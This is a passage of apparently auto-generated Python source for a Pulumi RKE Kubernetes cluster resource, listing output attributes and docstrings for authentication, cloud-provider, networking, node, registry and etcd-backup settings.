* `strategy` (`str`) - Authentication strategy that will be used in RKE k8s cluster. Default: `x509` (string)
* `webhook` (`dict`) - Webhook configuration options (list maxitem: 1)
* `cacheTimeout` (`str`) - Controls how long to cache authentication decisions (string)
* `configFile` (`str`) - Multiline string that represent a custom webhook config file (string)
"""
authorization: pulumi.Output[dict]
"""
RKE k8s cluster authorization mode configuration (list maxitems:1)
* `mode` (`str`) - RKE mode for authorization. `rbac` and `none` modes are available. Default `rbac` (string)
* `options` (`dict`) - Network provider options (map)
"""
bastion_host: pulumi.Output[dict]
"""
RKE k8s cluster bastion Host configuration (list maxitems:1)
* `address` (`str`) - Address ip for node (string)
* `port` (`str`) - Port used for SSH communication. Default `22` (string)
* `ssh_agent_auth` (`bool`) - SSH Agent Auth enable (bool)
* `sshCert` (`str`) - SSH Certificate (string)
* `ssh_cert_path` (`str`) - SSH Certificate path (string)
* `sshKey` (`str`) - SSH Private Key (string)
* `ssh_key_path` (`str`) - SSH Private Key path (string)
* `user` (`str`) - Registry user (string)
"""
ca_crt: pulumi.Output[str]
"""
(Computed/Sensitive) RKE k8s cluster CA certificate (string)
"""
cert_dir: pulumi.Output[str]
"""
Specify a certificate dir path (string)
"""
certificates: pulumi.Output[list]
"""
(Computed/Sensitive) RKE k8s cluster certificates (string)
* `certificate` (`str`)
* `commonName` (`str`)
* `config` (`str`)
* `configEnvName` (`str`)
* `configPath` (`str`)
* `envName` (`str`)
* `id` (`str`) - (Computed) The ID of the resource (string)
* `key` (`str`) - TLS key for etcd service (string)
* `keyEnvName` (`str`)
* `keyPath` (`str`)
* `name` (`str`) - Name of virtualcenter config for Vsphere Cloud Provider config (string)
* `ouName` (`str`)
* `path` (`str`) - Audit log path. Default: `/var/log/kube-audit/audit-log.json` (string)
"""
client_cert: pulumi.Output[str]
"""
(Computed/Sensitive) RKE k8s cluster client certificate (string)
"""
client_key: pulumi.Output[str]
"""
(Computed/Sensitive) RKE k8s cluster client key (string)
"""
cloud_provider: pulumi.Output[dict]
"""
Calico cloud provider (string)
* `awsCloudConfig` (`dict`) - Use aws_cloud_provider instead
* `global` (`dict`) - (list maxitems:1)
* `disableSecurityGroupIngress` (`bool`) - Disables the automatic ingress creation. Default `false` (bool)
* `disableStrictZoneCheck` (`bool`) - Setting this to true will disable the check and provide a warning that the check was skipped. Default `false` (bool)
* `elbSecurityGroup` (`str`) - Use these ELB security groups instead create new (string)
* `kubernetesClusterId` (`str`) - The cluster id we'll use to identify our cluster resources (string)
* `kubernetesClusterTag` (`str`) - Legacy cluster id we'll use to identify our cluster resources (string)
* `roleArn` (`str`) - IAM role to assume when interaction with AWS APIs (string)
* `routeTableId` (`str`) - Enables using a specific RouteTable (string)
* `subnetId` (`str`) - (string)
* `vpc` (`str`) - The AWS VPC flag enables the possibility to run the master components on a different aws account, on a different cloud provider or on-premises. If the flag is set also the KubernetesClusterTag must be provided (string)
* `zone` (`str`) - The AWS zone (string)
* `serviceOverrides` (`list`) - (list)
* `key` (`str`) - TLS key for etcd service (string)
* `region` (`str`) - Region for S3 service (string)
* `service` (`str`) - (string)
* `signingMethod` (`str`) - (string)
* `signingName` (`str`) - (string)
* `signingRegion` (`str`) - (string)
* `url` (`str`) - Registry URL (string)
* `awsCloudProvider` (`dict`) - AWS Cloud Provider config [rke-aws-cloud-provider](https://rancher.com/docs/rke/latest/en/config-options/cloud-providers/aws/) (list maxitems:1)
* `global` (`dict`) - (list maxitems:1)
* `disableSecurityGroupIngress` (`bool`) - Disables the automatic ingress creation. Default `false` (bool)
* `disableStrictZoneCheck` (`bool`) - Setting this to true will disable the check and provide a warning that the check was skipped. Default `false` (bool)
* `elbSecurityGroup` (`str`) - Use these ELB security groups instead create new (string)
* `kubernetesClusterId` (`str`) - The cluster id we'll use to identify our cluster resources (string)
* `kubernetesClusterTag` (`str`) - Legacy cluster id we'll use to identify our cluster resources (string)
* `roleArn` (`str`) - IAM role to assume when interaction with AWS APIs (string)
* `routeTableId` (`str`) - Enables using a specific RouteTable (string)
* `subnetId` (`str`) - (string)
* `vpc` (`str`) - The AWS VPC flag enables the possibility to run the master components on a different aws account, on a different cloud provider or on-premises. If the flag is set also the KubernetesClusterTag must be provided (string)
* `zone` (`str`) - The AWS zone (string)
* `serviceOverrides` (`list`) - (list)
* `key` (`str`) - TLS key for etcd service (string)
* `region` (`str`) - Region for S3 service (string)
* `service` (`str`) - (string)
* `signingMethod` (`str`) - (string)
* `signingName` (`str`) - (string)
* `signingRegion` (`str`) - (string)
* `url` (`str`) - Registry URL (string)
* `azureCloudConfig` (`dict`) - Use azure_cloud_provider instead
* `aadClientCertPassword` (`str`) - (string)
* `aadClientCertPath` (`str`) - (string)
* `aadClientId` (`str`) - (string)
* `aadClientSecret` (`str`) - (string)
* `cloud` (`str`) - (string)
* `cloudProviderBackoff` (`bool`) - (bool)
* `cloudProviderBackoffDuration` (`float`) - (int)
* `cloudProviderBackoffExponent` (`float`) - (int)
* `cloudProviderBackoffJitter` (`float`) - (int)
* `cloudProviderBackoffRetries` (`float`) - (int)
* `cloudProviderRateLimit` (`bool`) - (bool)
* `cloudProviderRateLimitBucket` (`float`) - (int)
* `cloudProviderRateLimitQps` (`float`) - (int)
* `loadBalancerSku` (`str`)
* `location` (`str`) - (string)
* `maximumLoadBalancerRuleCount` (`float`) - (int)
* `primaryAvailabilitySetName` (`str`) - (string)
* `primaryScaleSetName` (`str`) - (string)
* `resourceGroup` (`str`) - (string)
* `routeTableName` (`str`) - (string)
* `securityGroupName` (`str`) - (string)
* `subnetName` (`str`) - (string)
* `subscriptionId` (`str`) - (string)
* `tenantId` (`str`) - Required if `tenant_name` not provided. (string)
* `useInstanceMetadata` (`bool`) - (bool)
* `useManagedIdentityExtension` (`bool`) - (bool)
* `vmType` (`str`) - (string)
* `vnetName` (`str`) - (string)
* `vnetResourceGroup` (`str`) - (string)
* `azureCloudProvider` (`dict`) - Azure Cloud Provider config [rke-azure-cloud-provider](https://rancher.com/docs/rke/latest/en/config-options/cloud-providers/azure/) (list maxitems:1)
* `aadClientCertPassword` (`str`) - (string)
* `aadClientCertPath` (`str`) - (string)
* `aadClientId` (`str`) - (string)
* `aadClientSecret` (`str`) - (string)
* `cloud` (`str`) - (string)
* `cloudProviderBackoff` (`bool`) - (bool)
* `cloudProviderBackoffDuration` (`float`) - (int)
* `cloudProviderBackoffExponent` (`float`) - (int)
* `cloudProviderBackoffJitter` (`float`) - (int)
* `cloudProviderBackoffRetries` (`float`) - (int)
* `cloudProviderRateLimit` (`bool`) - (bool)
* `cloudProviderRateLimitBucket` (`float`) - (int)
* `cloudProviderRateLimitQps` (`float`) - (int)
* `loadBalancerSku` (`str`)
* `location` (`str`) - (string)
* `maximumLoadBalancerRuleCount` (`float`) - (int)
* `primaryAvailabilitySetName` (`str`) - (string)
* `primaryScaleSetName` (`str`) - (string)
* `resourceGroup` (`str`) - (string)
* `routeTableName` (`str`) - (string)
* `securityGroupName` (`str`) - (string)
* `subnetName` (`str`) - (string)
* `subscriptionId` (`str`) - (string)
* `tenantId` (`str`) - Required if `tenant_name` not provided. (string)
* `useInstanceMetadata` (`bool`) - (bool)
* `useManagedIdentityExtension` (`bool`) - (bool)
* `vmType` (`str`) - (string)
* `vnetName` (`str`) - (string)
* `vnetResourceGroup` (`str`) - (string)
* `customCloudConfig` (`str`) - Use custom_cloud_provider instead
* `customCloudProvider` (`str`) - Custom Cloud Provider config (string)
* `name` (`str`) - Name of virtualcenter config for Vsphere Cloud Provider config (string)
* `openstackCloudConfig` (`dict`) - Use openstack_cloud_provider instead
* `blockStorage` (`dict`) - (list maxitems:1)
* `bsVersion` (`str`) - (string)
* `ignoreVolumeAz` (`bool`) - (string)
* `trustDevicePath` (`bool`) - (string)
* `global` (`dict`) - (list maxitems:1)
* `authUrl` (`str`) - (string)
* `caFile` (`str`) - (string)
* `domainId` (`str`) - Required if `domain_name` not provided. (string)
* `domainName` (`str`) - Required if `domain_id` not provided. (string)
* `password` (`str`) - Registry password (string)
* `region` (`str`) - Region for S3 service (string)
* `tenantId` (`str`) - Required if `tenant_name` not provided. (string)
* `tenantName` (`str`) - Required if `tenant_id` not provided. (string)
* `trustId` (`str`) - (string)
* `userId` (`str`) - Required if `username` not provided. (string)
* `username` (`str`) - Required if `user_id` not provided. (string)
* `loadBalancer` (`dict`) - (list maxitems:1)
* `createMonitor` (`bool`) - (bool)
* `floatingNetworkId` (`str`) - (string)
* `lbMethod` (`str`) - (string)
* `lbProvider` (`str`) - (string)
* `lbVersion` (`str`) - (string)
* `manageSecurityGroups` (`bool`) - (bool)
* `monitorDelay` (`str`) - Default `60s` (string)
* `monitorMaxRetries` (`float`) - Default 5 (int)
* `monitorTimeout` (`str`) - Default `30s` (string)
* `subnetId` (`str`) - (string)
* `useOctavia` (`bool`) - (bool)
* `metadata` (`dict`) - (list maxitems:1)
* `requestTimeout` (`float`) - (int)
* `searchOrder` (`str`) - (string)
* `route` (`dict`) - (list maxitems:1)
* `routerId` (`str`) - (string)
* `openstackCloudProvider` (`dict`) - Openstack Cloud Provider config [rke-openstack-cloud-provider](https://rancher.com/docs/rke/latest/en/config-options/cloud-providers/openstack/) (list maxitems:1)
* `blockStorage` (`dict`) - (list maxitems:1)
* `bsVersion` (`str`) - (string)
* `ignoreVolumeAz` (`bool`) - (string)
* `trustDevicePath` (`bool`) - (string)
* `global` (`dict`) - (list maxitems:1)
* `authUrl` (`str`) - (string)
* `caFile` (`str`) - (string)
* `domainId` (`str`) - Required if `domain_name` not provided. (string)
* `domainName` (`str`) - Required if `domain_id` not provided. (string)
* `password` (`str`) - Registry password (string)
* `region` (`str`) - Region for S3 service (string)
* `tenantId` (`str`) - Required if `tenant_name` not provided. (string)
* `tenantName` (`str`) - Required if `tenant_id` not provided. (string)
* `trustId` (`str`) - (string)
* `userId` (`str`) - Required if `username` not provided. (string)
* `username` (`str`) - Required if `user_id` not provided. (string)
* `loadBalancer` (`dict`) - (list maxitems:1)
* `createMonitor` (`bool`) - (bool)
* `floatingNetworkId` (`str`) - (string)
* `lbMethod` (`str`) - (string)
* `lbProvider` (`str`) - (string)
* `lbVersion` (`str`) - (string)
* `manageSecurityGroups` (`bool`) - (bool)
* `monitorDelay` (`str`) - Default `60s` (string)
* `monitorMaxRetries` (`float`) - Default 5 (int)
* `monitorTimeout` (`str`) - Default `30s` (string)
* `subnetId` (`str`) - (string)
* `useOctavia` (`bool`) - (bool)
* `metadata` (`dict`) - (list maxitems:1)
* `requestTimeout` (`float`) - (int)
* `searchOrder` (`str`) - (string)
* `route` (`dict`) - (list maxitems:1)
* `routerId` (`str`) - (string)
* `vsphereCloudConfig` (`dict`) - Use vsphere_cloud_provider instead
* `disk` (`dict`) - (list maxitems:1)
* `scsiControllerType` (`str`) - (string)
* `global` (`dict`) - (list maxitems:1)
* `datacenter` (`str`) - (string)
* `datacenters` (`str`) - (string)
* `datastore` (`str`) - (string)
* `insecureFlag` (`bool`) - (bool)
* `password` (`str`) - Registry password (string)
* `port` (`str`) - Port used for SSH communication. Default `22` (string)
* `soapRoundtripCount` (`float`) - (int)
* `user` (`str`) - Registry user (string)
* `vmName` (`str`) - (string)
* `vmUuid` (`str`) - (string)
* `workingDir` (`str`) - (string)
* `network` (`dict`) - (list maxitems:1)
* `publicNetwork` (`str`) - (string)
* `virtualCenters` (`list`) - (List)
* `datacenters` (`str`) - (string)
* `name` (`str`) - Name of virtualcenter config for Vsphere Cloud Provider config (string)
* `password` (`str`) - Registry password (string)
* `port` (`str`) - Port used for SSH communication. Default `22` (string)
* `soapRoundtripCount` (`float`) - (int)
* `user` (`str`) - Registry user (string)
* `workspace` (`dict`) - (list maxitems:1)
* `datacenter` (`str`) - (string)
* `defaultDatastore` (`str`) - (string)
* `folder` (`str`) - Folder for S3 service. Available from Rancher v2.2.7 (string)
* `resourcepoolPath` (`str`) - (string)
* `server` (`str`) - (string)
* `vsphereCloudProvider` (`dict`) - Vsphere Cloud Provider config [rke-vsphere-cloud-provider](https://rancher.com/docs/rke/latest/en/config-options/cloud-providers/vsphere/) Extra argument `name` is required on `virtual_center` configuration. (list maxitems:1)
* `disk` (`dict`) - (list maxitems:1)
* `scsiControllerType` (`str`) - (string)
* `global` (`dict`) - (list maxitems:1)
* `datacenter` (`str`) - (string)
* `datacenters` (`str`) - (string)
* `datastore` (`str`) - (string)
* `insecureFlag` (`bool`) - (bool)
* `password` (`str`) - Registry password (string)
* `port` (`str`) - Port used for SSH communication. Default `22` (string)
* `soapRoundtripCount` (`float`) - (int)
* `user` (`str`) - Registry user (string)
* `vmName` (`str`) - (string)
* `vmUuid` (`str`) - (string)
* `workingDir` (`str`) - (string)
* `network` (`dict`) - (list maxitems:1)
* `publicNetwork` (`str`) - (string)
* `virtualCenters` (`list`) - (List)
* `datacenters` (`str`) - (string)
* `name` (`str`) - Name of virtualcenter config for Vsphere Cloud Provider config (string)
* `password` (`str`) - Registry password (string)
* `port` (`str`) - Port used for SSH communication. Default `22` (string)
* `soapRoundtripCount` (`float`) - (int)
* `user` (`str`) - Registry user (string)
* `workspace` (`dict`) - (list maxitems:1)
* `datacenter` (`str`) - (string)
* `defaultDatastore` (`str`) - (string)
* `folder` (`str`) - Folder for S3 service. Available from Rancher v2.2.7 (string)
* `resourcepoolPath` (`str`) - (string)
* `server` (`str`) - (string)
"""
cluster_cidr: pulumi.Output[str]
"""
Cluster CIDR option for kube controller service (string)
"""
cluster_dns_server: pulumi.Output[str]
"""
Cluster DNS Server option for kubelet service (string)
"""
cluster_domain: pulumi.Output[str]
"""
Cluster Domain option for kubelet service. Default `cluster.local` (string)
"""
cluster_name: pulumi.Output[str]
"""
RKE k8s cluster name used in the kube config (string)
"""
cluster_yaml: pulumi.Output[str]
"""
RKE k8s cluster config yaml encoded. Provider arguments take precedence over this one (string)
"""
control_plane_hosts: pulumi.Output[list]
"""
(Computed) RKE k8s cluster control plane nodes (list)
* `address` (`str`) - Address ip for node (string)
* `nodeName` (`str`) - Name of the host provisioned via docker machine (string)
"""
custom_certs: pulumi.Output[bool]
"""
Use custom certificates from a cert dir (string)
"""
delay_on_creation: pulumi.Output[float]
"""
RKE k8s cluster delay on creation (int)
"""
dind: pulumi.Output[bool]
"""
Deploy RKE cluster on a dind environment. Default: `false` (bool)
"""
dind_dns_server: pulumi.Output[str]
"""
DinD RKE cluster dns (string)
"""
dind_storage_driver: pulumi.Output[str]
"""
DinD RKE cluster storage driver (string)
"""
disable_port_check: pulumi.Output[bool]
"""
Enable/Disable RKE k8s cluster port checking. Default `false` (bool)
"""
dns: pulumi.Output[dict]
"""
RKE k8s cluster DNS Config (list maxitems:1)
* `nodeSelector` (`dict`) - Node selector key pair (map)
* `provider` (`str`) - Monitoring provider (string)
* `reverseCidrs` (`list`) - Reverse CIDRs (list)
* `upstreamNameservers` (`list`) - Upstream nameservers (list)
"""
etcd_hosts: pulumi.Output[list]
"""
(Computed) RKE k8s cluster etcd nodes (list)
* `address` (`str`) - Address ip for node (string)
* `nodeName` (`str`) - Name of the host provisioned via docker machine (string)
"""
ignore_docker_version: pulumi.Output[bool]
"""
Enable/Disable RKE k8s cluster strict docker version checking. Default `false` (bool)
"""
inactive_hosts: pulumi.Output[list]
"""
(Computed) RKE k8s cluster inactive nodes (list)
* `address` (`str`) - Address ip for node (string)
* `nodeName` (`str`) - Name of the host provisioned via docker machine (string)
"""
ingress: pulumi.Output[dict]
"""
Docker image for ingress (string)
* `dnsPolicy` (`str`) - Ingress controller DNS policy. `ClusterFirstWithHostNet`, `ClusterFirst`, `Default`, and `None` are supported. [K8S dns Policy](https://kubernetes.io/docs/concepts/services-networking/dns-pod-service/#pod-s-dns-policy) (string)
* `extraArgs` (`dict`) - Extra arguments for scheduler service (map)
* `nodeSelector` (`dict`) - Node selector key pair (map)
* `options` (`dict`) - Network provider options (map)
* `provider` (`str`) - Monitoring provider (string)
"""
internal_kube_config_yaml: pulumi.Output[str]
"""
(Computed/Sensitive) RKE k8s cluster internal kube config yaml (string)
"""
kube_admin_user: pulumi.Output[str]
"""
(Computed) RKE k8s cluster admin user (string)
"""
kube_config_yaml: pulumi.Output[str]
"""
(Computed/Sensitive) RKE k8s cluster kube config yaml (string)
"""
kubernetes_version: pulumi.Output[str]
"""
K8s version to deploy. If kubernetes image is specified, image version takes precedence. Default: `rke default` (string)
"""
monitoring: pulumi.Output[dict]
"""
RKE k8s cluster monitoring Config (list maxitems:1)
* `nodeSelector` (`dict`) - Node selector key pair (map)
* `options` (`dict`) - Network provider options (map)
* `provider` (`str`) - Monitoring provider (string)
"""
network: pulumi.Output[dict]
"""
(list maxitems:1)
* `calicoNetworkProvider` (`dict`) - Calico network provider config (list maxitems:1)
* `cloud_provider` (`str`) - Calico cloud provider (string)
* `canalNetworkProvider` (`dict`) - Canal network provider config (list maxitems:1)
* `iface` (`str`) - Flannel network interface (string)
* `flannelNetworkProvider` (`dict`) - Flannel network provider config (list maxitems:1)
* `iface` (`str`) - Flannel network interface (string)
* `mtu` (`float`) - Network provider MTU. Default `0` (int)
* `options` (`dict`) - Network provider options (map)
* `plugin` (`str`) - Network provider plugin. `calico`, `canal` (default), `flannel`, `none` and `weave` are supported. (string)
* `weaveNetworkProvider` (`dict`) - Weave network provider config (list maxitems:1)
* `password` (`str`) - Registry password (string)
"""
nodes: pulumi.Output[list]
"""
RKE k8s cluster nodes (list)
* `address` (`str`) - Address ip for node (string)
* `dockerSocket` (`str`) - Docker socket on the node that will be used in tunneling (string)
* `hostnameOverride` (`str`) - Hostname override for node (string)
* `internalAddress` (`str`) - Internal address that will be used for components communication (string)
* `labels` (`dict`) - Node labels (map)
* `nodeName` (`str`) - Name of the host provisioned via docker machine (string)
* `port` (`str`) - Port used for SSH communication. Default `22` (string)
* `roles` (`list`) - Node roles in k8s cluster. `controlplane`, `etcd` and `worker` are supported. (list)
* `rolesDeprecated` (`str`)
* `ssh_agent_auth` (`bool`) - SSH Agent Auth enable (bool)
* `sshCert` (`str`) - SSH Certificate (string)
* `ssh_cert_path` (`str`) - SSH Certificate path (string)
* `sshKey` (`str`) - SSH Private Key (string)
* `ssh_key_path` (`str`) - SSH Private Key path (string)
* `taints` (`list`) - Node taints (list)
* `effect` (`str`) - Taint effect. `NoExecute`, `NoSchedule` (default) and `PreferNoSchedule` are supported (string)
* `key` (`str`) - TLS key for etcd service (string)
* `value` (`str`) - Taint value (string)
* `user` (`str`) - Registry user (string)
"""
nodes_confs: pulumi.Output[list]
prefix_path: pulumi.Output[str]
"""
RKE k8s directory path (string)
"""
private_registries: pulumi.Output[list]
"""
RKE k8s cluster private docker registries (list)
* `isDefault` (`bool`) - Set as default registry. Default `false` (bool)
* `password` (`str`) - Registry password (string)
* `url` (`str`) - Registry URL (string)
* `user` (`str`) - Registry user (string)
"""
restore: pulumi.Output[dict]
"""
Restore cluster. Default `false` (bool)
* `restore` (`bool`) - Restore cluster. Default `false` (bool)
* `snapshotName` (`str`) - Snapshot name (string)
"""
rke_cluster_yaml: pulumi.Output[str]
"""
(Computed/Sensitive) RKE k8s cluster config yaml (string)
"""
rke_state: pulumi.Output[str]
"""
(Computed/Sensitive) RKE k8s cluster state (string)
"""
rotate_certificates: pulumi.Output[dict]
"""
RKE k8s cluster rotate certificates configuration (list maxitems:1)
* `caCertificates` (`bool`) - Rotate CA Certificates. Default `false` (bool)
* `services` (`list`) - Services to rotate their certs. `etcd`, `kubelet`, `kube-apiserver`, `kube-proxy`, `kube-scheduler` and `kube-controller-manager` are supported (list)
"""
running_system_images: pulumi.Output[dict]
"""
(Computed) RKE k8s cluster running system images list (list)
* `alpine` (`str`) - Docker image for alpine (string)
* `calicoCni` (`str`) - Docker image for calico_cni (string)
* `calicoControllers` (`str`) - Docker image for calico_controllers (string)
* `calicoCtl` (`str`) - Docker image for calico_ctl (string)
* `calicoFlexVol` (`str`) - Docker image for calico_flex_vol (string)
* `calicoNode` (`str`) - Docker image for calico_node (string)
* `canalCni` (`str`) - Docker image for canal_cni (string)
* `canalFlannel` (`str`) - Docker image for canal_flannel (string)
* `canalFlexVol` (`str`) - Docker image for canal_flex_vol (string)
* `canalNode` (`str`) - Docker image for canal_node (string)
* `certDownloader` (`str`) - Docker image for cert_downloader (string)
* `coredns` (`str`) - Docker image for coredns (string)
* `corednsAutoscaler` (`str`) - Docker image for coredns_autoscaler (string)
* `dnsmasq` (`str`) - Docker image for dnsmasq (string)
* `etcd` (`str`) - Docker image for etcd (string)
* `flannel` (`str`) - Docker image for flannel (string)
* `flannelCni` (`str`) - Docker image for flannel_cni (string)
* `ingress` (`str`) - Docker image for ingress (string)
* `ingressBackend` (`str`) - Docker image for ingress_backend (string)
* `kubeDns` (`str`) - Docker image for kube_dns (string)
* `kubeDnsAutoscaler` (`str`) - Docker image for kube_dns_autoscaler (string)
* `kubeDnsSidecar` (`str`) - Docker image for kube_dns_sidecar (string)
* `kubernetes` (`str`) - Docker image for kubernetes (string)
* `kubernetesServicesSidecar` (`str`) - Docker image for kubernetes_services_sidecar (string)
* `metricsServer` (`str`) - Docker image for metrics_server (string)
* `nginxProxy` (`str`) - Docker image for nginx_proxy (string)
* `nodelocal` (`str`) - Docker image for nodelocal (string)
* `podInfraContainer` (`str`) - Docker image for pod_infra_container (string)
* `weaveCni` (`str`) - Docker image for weave_cni (string)
* `weaveNode` (`str`) - Docker image for weave_node (string)
* `windowsPodInfraContainer` (`str`) - Docker image for windows_pod_infra_container (string)
"""
services: pulumi.Output[dict]
"""
Services to rotate their certs. `etcd`, `kubelet`, `kube-apiserver`, `kube-proxy`, `kube-scheduler` and `kube-controller-manager` are supported (list)
* `etcd` (`dict`) - Docker image for etcd (string)
* `backupConfig` (`dict`) - Backup options for etcd service. Just for Rancher v2.2.x (list maxitems:1)
* `enabled` (`bool`) - Enable secrets encryption. Default: `false` (bool)
* `intervalHours` (`float`) - Interval hours for etcd backup. Default `12` (int)
* `retention` (`float`) - Retention for etcd backup. Default `6` (int)
* `s3BackupConfig` (`dict`) - S3 config options for etcd backup (list maxitems:1)
* `accessKey` (`str`) - Access key for S3 service (string)
* `bucketName` (`str`) - Bucket name for S3 service (string)
* `customCa` (`str`) - Base64 encoded custom CA for S3 service. Use filebase64(<FILE>) for encoding file. Available from Rancher v2.2.5 (string)
* `endpoint` (`str`) - Endpoint for S3 service (string)
* `folder` (`str`) - Folder for S3 service. Available from Rancher v2.2.7 (string)
* `region` (`str`) - Region for S3 service (string)
* `secretKey` (`str`) - Secret key for S3 service (string)
* `safeTimestamp` (`bool`) - Safe timestamp for etcd backup. Default: `false` (bool)
* `caCert` (`str`) - TLS CA certificate for etcd service (string)
* `cert` (`str`) - TLS certificate for etcd service (string)
* `creation` (`str`) - Creation option for etcd service (string)
* `externalUrls` (`list`) - External urls for etcd service (list)
* `extraArgs` (`dict`) - Extra arguments for scheduler service (map)
* `extraBinds` (`list`) - Extra binds for scheduler service (list)
* `extraEnvs` (`list`) - Extra environment for scheduler service (list)
* `gid` (`float`) - Etcd service GID. Default: `0`. For Rancher v2.3.x or above (int)
* `image` (`str`) - Docker image for scheduler service (string)
* `key` (`str`) - TLS key for etcd service (string)
* `path` (`str`) - Audit log path. Default: `/var/log/kube-audit/audit-log.json` (string)
* `retention` (`str`) - Retention for etcd backup. Default `6` (int)
* `snapshot` (`bool`) - Snapshot option for etcd service. Default `true` (bool)
* `uid` (`float`) - Etcd service UID. Default: `0`. For Rancher v2.3.x or above (int)
* `kubeApi` (`dict`) - Kube API options for RKE services (list maxitems:1)
* `alwaysPullImages` (`bool`) - Enable [AlwaysPullImages](https://kubernetes.io/docs/reference/access-authn-authz/admission-controllers/#alwayspullimages) Admission controller plugin. [Rancher docs](https://rancher.com/docs/rke/latest/en/config-options/services/#kubernetes-api-server-options) Default: `false` (bool)
* `auditLog` (`dict`) - K8s audit log configuration. (list maxitem: 1)
* `configuration` (`dict`) - Audit log configuration. (list maxtiem: 1)
* `format` (`str`) - Audit log format. Default: `json` (string)
* `maxAge` (`float`) - Audit log max age. Default: `30` (int)
* `maxBackup` (`float`) - Audit log max backup. Default: `10` (int)
* `maxSize` (`float`) - Audit log max size. Default: `100` (int)
* `path` (`str`) - Audit log path. Default: `/var/log/kube-audit/audit-log.json` (string)
* `policy` (`str`) - Audit policy json encoded definition. `"apiVersion"` and `"kind":"Policy","rules"` fields are required in the json. Ex. `jsonencode({"apiVersion":"audit.k8s.io/v1","kind":"Policy","rules":[{"level":"RequestResponse","resources":[{"group":"","resources":["pods"]}]}]})` [More info](https://rancher.com/docs/rke/latest/en/config-options/audit-log/) (string)
* `enabled` (`bool`) - Enable secrets encryption. Default: `false` (bool)
* `eventRateLimit` (`dict`) - K8s event rate limit configuration. (list maxitem: 1)
* `enabled` (`bool`) - Enable secrets encryption. Default: `false` (bool)
* `extraArgs` (`dict`) - Extra arguments for scheduler service (map)
* `extraBinds` (`list`) - Extra binds for scheduler service (list)
* `extraEnvs` (`list`) - Extra environment for scheduler service (list)
* `image` (`str`) - Docker image for scheduler service (string)
* `podSecurityPolicy` (`bool`) - Pod Security Policy option for kube API service. Default `false` (bool)
* `secretsEncryptionConfig` (`dict`) - [Encrypt k8s secret data configration](https://rancher.com/docs/rke/latest/en/config-options/secrets-encryption/). (list maxitem: 1)
* `enabled` (`bool`) - Enable secrets encryption. Default: `false` (bool)
* `serviceClusterIpRange` (`str`) - Service Cluster ip Range option for kube controller service (string)
* `serviceNodePortRange` (`str`) - Service Node Port Range option for kube API service (string)
* `kubeController` (`dict`) - Kube Controller options for RKE services (list maxitems:1)
* `cluster_cidr` (`str`) - Cluster CIDR option for kube controller service (string)
* `extraArgs` (`dict`) - Extra arguments for scheduler service (map)
* `extraBinds` (`list`) - Extra binds for scheduler service (list)
* `extraEnvs` (`list`) - Extra environment for scheduler service (list)
* `image` (`str`) - Docker image for scheduler service (string)
* `serviceClusterIpRange` (`str`) - Service Cluster ip Range option for kube controller service (string)
* `kubelet` (`dict`) - Kubelet options for RKE services (list maxitems:1)
* `cluster_dns_server` (`str`) - Cluster DNS Server option for kubelet service (string)
* `cluster_domain` (`str`) - Cluster Domain option for kubelet service. Default `cluster.local` (string)
* `extraArgs` (`dict`) - Extra arguments for scheduler service (map)
* `extraBinds` (`list`) - Extra binds for scheduler service (list)
* `extraEnvs` (`list`) - Extra environment for scheduler service (list)
* `failSwapOn` (`bool`) - Enable or disable failing when swap on is not supported (bool)
* `generate_serving_certificate` [Generate a certificate signed by the kube-ca](https://rancher.com/docs/rke/latest/en/config-options/services/#kubelet-serving-certificate-requirements). Default `false` (bool)
* `generateServingCertificate` (`bool`)
* `image` (`str`) - Docker image for scheduler service (string)
* `infraContainerImage` (`str`) - Infra container image for kubelet service (string)
* `kubeproxy` (`dict`) - Kubeproxy options for RKE services (list maxitems:1)
* `extraArgs` (`dict`) - Extra arguments for scheduler service (map)
* `extraBinds` (`list`) - Extra binds for scheduler service (list)
* `extraEnvs` (`list`) - Extra environment for scheduler service (list)
* `image` (`str`) - Docker image for scheduler service (string)
* `scheduler` (`dict`) - Scheduler options for RKE services (list maxitems:1)
* `extraArgs` (`dict`) - Extra arguments for scheduler service (map)
* `extraBinds` (`list`) - Extra binds for scheduler service (list)
* `extraEnvs` (`list`) - Extra environment for scheduler service (list)
* `image` (`str`) - Docker image for scheduler service (string)
"""
services_etcd_deprecated: pulumi.Output[dict]
"""
Use services.etcd instead (list maxitems:1)
* `backupConfig` (`dict`) - Backup options for etcd service. Just for Rancher v2.2.x (list maxitems:1)
* `enabled` (`bool`) - Enable secrets encryption. Default: `false` (bool)
* `intervalHours` (`float`) - Interval hours for etcd backup. Default `12` (int)
* `retention` (`float`) - Retention for etcd backup. Default `6` (int)
* `s3BackupConfig` (`dict`) - S3 config options for etcd backup (list maxitems:1)
* `accessKey` (`str`) - Access key for S3 service (string)
* `bucketName` (`str`) - Bucket name for S3 service (string)
* `customCa` (`str`) - Base64 encoded custom CA for S3 service. Use filebase64(<FILE>) for encoding file. Available from Rancher v2.2.5 (string)
* `endpoint` (`str`) - Endpoint for S3 service (string)
* `folder` (`str`) - Folder for S3 service. Available from Rancher v2.2.7 (string)
* `region` (`str`) - Region for S3 service (string)
* `secretKey` (`str`) - Secret key for S3 service (string)
* `safeTimestamp` (`bool`) - Safe timestamp for etcd backup. Default: `false` (bool)
* `caCert` (`str`) - TLS CA certificate for etcd service (string)
* `cert` (`str`) - TLS certificate for etcd service (string)
* `creation` (`str`) - Creation option for etcd service (string)
* `externalUrls` (`list`) - External urls for etcd service (list)
* `extraArgs` (`dict`) - Extra arguments for scheduler service (map)
* `extraBinds` (`list`) - Extra binds for scheduler service (list)
* `extraEnvs` (`list`) - Extra environment for scheduler service (list)
* `gid` (`float`) - Etcd service GID. Default: `0`. For Rancher v2.3.x or above (int)
* `image` (`str`) - Docker image for scheduler service (string)
* `key` (`str`) - TLS key for etcd service (string)
* `path` (`str`) - Audit log path. Default: `/var/log/kube-audit/audit-log.json` (string)
* `retention` (`str`) - Retention for etcd backup. Default `6` (int)
* `snapshot` (`bool`) - Snapshot option for etcd service. Default `true` (bool)
* `uid` (`float`) - Etcd service UID. Default: `0`. For Rancher v2.3.x or above (int)
"""
services_kube_api_deprecated: pulumi.Output[dict]
"""
Use services.kube_api instead (list maxitems:1)
* `alwaysPullImages` (`bool`) - Enable [AlwaysPullImages](https://kubernetes.io/docs/reference/access-authn-authz/admission-controllers/#alwayspullimages) Admission controller plugin. [Rancher docs](https://rancher.com/docs/rke/latest/en/config-options/services/#kubernetes-api-server-options) Default: `false` (bool)
* `auditLog` (`dict`) - K8s audit log configuration. (list maxitem: 1)
* `configuration` (`dict`) - Audit log configuration. (list maxtiem: 1)
* `format` (`str`) - Audit log format. Default: `json` (string)
